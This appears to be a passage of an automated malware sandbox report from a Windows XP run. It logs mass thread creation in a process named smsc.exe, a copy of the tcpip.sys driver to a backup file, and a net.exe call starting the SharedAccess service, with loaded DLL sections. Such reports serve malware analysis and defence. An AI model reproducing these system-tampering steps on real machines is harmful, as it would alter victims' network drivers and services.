Thread created	PID: 740 TID: 824 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821657970
Thread created	PID: 740 TID: 1128 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821775167
Thread created	PID: 740 TID: 1504 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821903374
Thread created	PID: 740 TID: 548 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822048761
Thread created	PID: 740 TID: 968 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822165214
Thread created	PID: 740 TID: 596 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822277290
Thread created	PID: 740 TID: 1332 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822384111
Thread created	PID: 740 TID: 1760 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822499904
Thread created	PID: 740 TID: 2052 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822613831
Thread created	PID: 740 TID: 2056 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822719648
Thread created	PID: 740 TID: 2060 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822834310
Thread created	PID: 740 TID: 2064 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1822946599
Thread created	PID: 740 TID: 2068 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823055909
Thread created	PID: 740 TID: 2072 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823169849
Thread created	PID: 740 TID: 2076 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823283327
Thread created	PID: 740 TID: 2084 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823393875
Thread created	PID: 740 TID: 2088 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823506391
Thread created	PID: 740 TID: 2092 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823617170
Thread created	PID: 740 TID: 2096 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823727177
Thread created	PID: 740 TID: 2104 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1823919879
Thread created	PID: 740 TID: 2108 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1824028708
Thread created	PID: 740 TID: 2112 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1824177662
Thread created	PID: 740 TID: 2116 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1824289748
Thread created	PID: 740 TID: 2160 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1824975211
Thread created	PID: 740 TID: 2164 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1825245158
Thread created	PID: 740 TID: 2180 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1825562594
Thread created	PID: 740 TID: 2192 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1825852093
Thread created	PID: 740 TID: 2196 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826035734
Thread created	PID: 740 TID: 2200 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826142824
Thread created	PID: 740 TID: 2204 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826245502
Thread created	PID: 740 TID: 2208 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826359438
Thread created	PID: 740 TID: 2212 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826477965
Thread created	PID: 740 TID: 2216 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826580713
Thread created	PID: 740 TID: 2220 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826695701
Thread created	PID: 740 TID: 2224 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1826819893
Thread created	PID: 740 TID: 2228 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1827474650
Thread created	PID: 740 TID: 2232 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1827485232
Thread created	PID: 740 TID: 2236 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1827514693
Thread created	PID: 740 TID: 2240 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1827607508
Thread delayed	Time: 2 TID: 2376	success or wait	1827618591
Thread delayed	Time: 2 TID: 2376	success or wait	1828087283
Thread created	PID: 740 TID: 2244 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828139036
Thread created	PID: 740 TID: 2248 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828161759
Thread created	PID: 740 TID: 2252 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828313950
Thread created	PID: 740 TID: 2256 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828320647
Thread delayed	Time: 2 TID: 2376	success or wait	1828397625
Thread created	PID: 740 TID: 2260 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828463123
Thread created	PID: 740 TID: 2264 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828481389
Thread delayed	Time: 2 TID: 2376	success or wait	1828515891
Thread created	PID: 740 TID: 2268 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828641529
Thread created	PID: 740 TID: 2276 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828643649
Thread delayed	Time: 2 TID: 2376	success or wait	1828723208
Thread created	PID: 740 TID: 2280 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828825464
Thread created	PID: 740 TID: 2284 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828838637
Thread delayed	Time: 2 TID: 2376	success or wait	1828875472
Thread created	PID: 740 TID: 2296 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828961736
Thread created	PID: 740 TID: 2304 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1828963741
Thread delayed	Time: 2 TID: 2376	success or wait	1829062231
Thread created	PID: 740 TID: 2292 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829129009
Thread created	PID: 740 TID: 2308 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829129619
Thread delayed	Time: 2 TID: 2376	success or wait	1829202724
Thread created	PID: 740 TID: 2312 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829285032
Thread delayed	Time: 2 TID: 2376	success or wait	1829304221
Thread created	PID: 740 TID: 2316 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829306042
Thread created	PID: 740 TID: 2300 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829432017
Thread delayed	Time: 2 TID: 2376	success or wait	1829447088
Thread created	PID: 740 TID: 2288 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829449255
Thread created	PID: 740 TID: 2336 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829648497
Thread created	PID: 740 TID: 2324 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1829649140
Thread delayed	Time: 2 TID: 2376	success or wait	1829738776
Thread created	PID: 740 TID: 2384 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830404894
Thread created	PID: 740 TID: 2380 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830413995
Thread delayed	Time: 2 TID: 2376	success or wait	1830646779
Thread created	PID: 740 TID: 2392 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830647398
Thread created	PID: 740 TID: 2396 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830650909
Thread delayed	Time: 2 TID: 2376	success or wait	1830703383
Thread delayed	Time: 2 TID: 2376	success or wait	1830724604
Thread created	PID: 740 TID: 2400 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830728659
Thread created	PID: 740 TID: 2404 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830772162
Thread delayed	Time: 2 TID: 2376	success or wait	1830802352
Thread created	PID: 740 TID: 2408 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830830292
Thread created	PID: 740 TID: 2416 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830884037
Thread delayed	Time: 2 TID: 2376	success or wait	1830902503
Thread created	PID: 740 TID: 2420 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830938923
Thread created	PID: 740 TID: 2412 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1830996369
Thread delayed	Time: 2 TID: 2376	success or wait	1831015772
Thread created	PID: 740 TID: 2428 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831053356
Thread created	PID: 740 TID: 2432 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831106888
Thread delayed	Time: 2 TID: 2376	success or wait	1831133126
Thread created	PID: 740 TID: 2440 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831163718
Thread created	PID: 740 TID: 2436 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831220109
Thread delayed	Time: 2 TID: 2376	success or wait	1831239873
Thread created	PID: 740 TID: 2448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831274701
Thread created	PID: 740 TID: 2452 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831333823
Thread delayed	Time: 2 TID: 2376	success or wait	1831354204
Thread created	PID: 740 TID: 2444 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831394098
Thread created	PID: 740 TID: 2456 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831443094
Thread delayed	Time: 2 TID: 2376	success or wait	1831466848
Thread created	PID: 740 TID: 2460 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831500481
Thread created	PID: 740 TID: 2464 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831611206
Thread created	PID: 740 TID: 1168 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831723305
Thread created	PID: 740 TID: 2472 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831837359
Thread created	PID: 740 TID: 2468 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1831945716
Thread created	PID: 740 TID: 2476 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832058683
Thread created	PID: 740 TID: 2480 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832171347
Thread created	PID: 740 TID: 2484 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832292242
Thread created	PID: 740 TID: 2488 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832400571
Thread created	PID: 740 TID: 1912 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832508373
Thread created	PID: 740 TID: 2492 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832618153
Thread created	PID: 740 TID: 2504 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832731760
Thread created	PID: 740 TID: 2500 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832845351
Thread created	PID: 740 TID: 2496 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1832952809
Thread created	PID: 740 TID: 2508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833065663
Thread created	PID: 740 TID: 2512 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833177758
Thread created	PID: 740 TID: 2520 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833288557
Thread created	PID: 740 TID: 2524 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833405250
Thread created	PID: 740 TID: 2528 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833512979
Thread created	PID: 740 TID: 2532 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833623541
Thread created	PID: 740 TID: 2536 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833737403
Thread created	PID: 740 TID: 2548 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833848211
Thread created	PID: 740 TID: 2544 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1833960609
Thread created	PID: 740 TID: 2540 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1834072257
Thread created	PID: 740 TID: 2556 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1834184093
Thread delayed	Time: 2 TID: 2376	success or wait	1835246445
Thread delayed	Time: 2 TID: 2376	success or wait	1835248644
Thread delayed	Time: 2 TID: 2376	success or wait	1835582578
Thread delayed	Time: 2 TID: 2376	success or wait	1835685826
Thread delayed	Time: 2 TID: 2376	success or wait	1835954957
Thread delayed	Time: 2 TID: 2376	success or wait	1836082187
Thread delayed	Time: 2 TID: 2376	success or wait	1836247417
Thread delayed	Time: 2 TID: 2376	success or wait	1836353497
Thread delayed	Time: 2 TID: 2376	success or wait	1836476751
Thread delayed	Time: 2 TID: 2376	success or wait	1836639455
Thread delayed	Time: 2 TID: 2376	success or wait	1836911262
Thread delayed	Time: 2 TID: 2376	success or wait	1837861947
Thread delayed	Time: 2 TID: 2376	success or wait	1837937974
Thread delayed	Time: 2 TID: 2376	success or wait	1838000066
Thread delayed	Time: 2 TID: 2376	success or wait	1838027940
Thread delayed	Time: 2 TID: 2376	success or wait	1838109252
Thread delayed	Time: 2 TID: 2376	success or wait	1838223186
Thread delayed	Time: 2 TID: 2376	success or wait	1838349080
Thread delayed	Time: 2 TID: 2376	success or wait	1838440719
Thread delayed	Time: 2 TID: 2376	success or wait	1838557050
Thread delayed	Time: 2 TID: 2376	success or wait	1838665196
Thread delayed	Time: 12 TID: 9494	success or wait	1843204741
Thread delayed	Time: 10 TID: 5910	success or wait	1880368692
Thread delayed	Time: 12 TID: 9494	success or wait	1886145996
Thread delayed	Time: 5 TID: 5910	success or wait	1917210071
Thread delayed	Time: 12 TID: 9494	success or wait	1929098323
File copied	From: C:\WINDOWS\system32\drivers\tcpip.sys to: C:\WINDOWS\system32\drivers\tcpip.sys.bck	success or wait	1935099263
Thread delayed	Time: 12 TID: 9494	success or wait	1972186359

Analysis File: net.exe PID: 1452 Parent PID: 252

Sections

General
Start time:	07:41:14
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net start SharedAccess
Imagebase:	0x1000000
File size:	42496 bytes
MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	8C0000	126976	own pid	readonly	success or wait	1	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
728	C:\WINDOWS\system32\net1.exe	net1 start SharedAccess	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1600811396
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1600881559
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600911210
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600914841
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1600930393
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1600987626
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1601044109
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1601055329
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1601080661
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1601211701
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1601274780
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1601338113
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1601400448
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1601587324
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1601627907
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1601654248
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1601662787
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1601666468
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1601687385
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1601704717
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1601734203
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1601765421
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1601785674
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1601799320
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1601821159
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1601847995
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1601877283
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1601916299
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602123224
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602133494
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1602142631
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1602662796
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1602713026
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1602721558
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1602868403
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602877256
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602944476
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1603015047
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1603063430
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1603218964
